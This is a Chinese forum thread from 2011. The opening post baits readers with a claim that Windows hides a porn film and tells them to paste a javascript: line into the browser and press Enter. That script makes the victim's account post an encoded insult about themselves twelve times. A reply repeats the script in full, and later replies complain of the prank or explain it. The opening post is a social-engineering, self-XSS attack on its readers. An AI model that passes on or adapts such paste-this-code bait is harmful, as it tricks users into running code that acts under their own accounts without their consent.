帖子主题:每台电脑的WINDOWS系统里,都藏着一部A片!

共 28743 个阅读者 

• 军衔:空军少校
  • 军号:3461927
  • 工分:42574
左箭头-小图标

每台电脑的WINDOWS系统里,都藏着一部A片!

文章提交者:主义战士 加贴在 搞笑幽默 铁血论坛 http://bbs.tiexue.net/bbs80-0-1.html

javascript:var c=rich_postor._getData();c.content='\u6211\u662F\u0026\u0023\u0078\u0035\u0030\u0042\u0042\u003B\u0026\u0023\u0078\u0039\u0030\u0033\u0043\u003B';for(var i=1;i<=12;i++){PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});};void 0

把这个复制 粘贴到此浏览器 按回车 就知道在哪里

延伸阅读: 电脑 WINDOWS
  • 本帖已赚工分: 577
    本帖已赚金币: 0
  • 本帖已赚工分: 577
    本帖已赚金币: 0
打赏
收藏文本

网友回复

• 军衔:陆军上等兵
  • 军号:2529836
  • 工分:363
左箭头-小图标

禽兽,坑爹啊!

• 军衔:空军中士
  • 军号:3289817
  • 工分:1131
左箭头-小图标

javascript:var c=rich_postor._getData();c.content='\u6211\u662F\u0026\u0023\u0078\u0035\u0030\u0042\u0042\u003B\u0026\u0023\u0078\u0039\u0030\u0033\u0043\u003B';for(var i=1;i<=12;i++){PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});};void 0

• 军衔:陆军少尉
  • 军号:2475762
  • 工分:7997
左箭头-小图标

尼玛脑壳有包,啥子不玩玩这个。

• 军衔:陆军上士
  • 军号:2681205
  • 工分:3597
左箭头-小图标

删这样的垃圾帖怎么那么不及时?

• 军号:3445095
  • 工分:5443
左箭头-小图标

以下是引用西门吸血 在第8楼的发言:

以下是引用美分党去死 在第6楼的发言:

有人试了啊,那恭喜你们了,晚上楼主可以坐在电脑前看你们的真人秀了。

什么情况?求解答

我开玩笑的,别当真。

• 军衔:海军上等兵
  • 军号:1692803
  • 工分:186
左箭头-小图标

狼来了的故事告诉我们,这种玩笑可一可二,不可再三再四!

反正我再不上你们这些小鬼子的当了!!

• 军号:2712286
  • 工分:2589
左箭头-小图标

以下是引用美分党去死 在第6楼的发言:

有人试了啊,那恭喜你们了,晚上楼主可以坐在电脑前看你们的真人秀了。

什么情况?求解答

• 军号:2712286
  • 工分:2589
左箭头-小图标

这是一段JAVA脚本,如果我没猜错,应该是回帖的脚本

\u6211\u662F\u0026\u0023\u0078\u0035\u0030\u0042\u0042\u003B\u0026\u0023\u0078\u0039\u0030\u0033\u0043\u003B

是文字代码,可以转换为汉字

不过好像只适用于百度贴吧,其他地方MS用不了。

本文内容于 2011/10/14 17:48:12 被西门吸血编辑

• 军号:3445095
  • 工分:5443
左箭头-小图标

• 军衔:陆军上尉
  • 军号:360086
  • 工分:16133
左箭头-小图标

坑爹丫,你。

• 军衔:空军上士
  • 军号:2413151
  • 工分:3657
左箭头-小图标

貌似不行的哦,楼主坑爹啊

• 军衔:警察二级警徽
  • 军号:3893045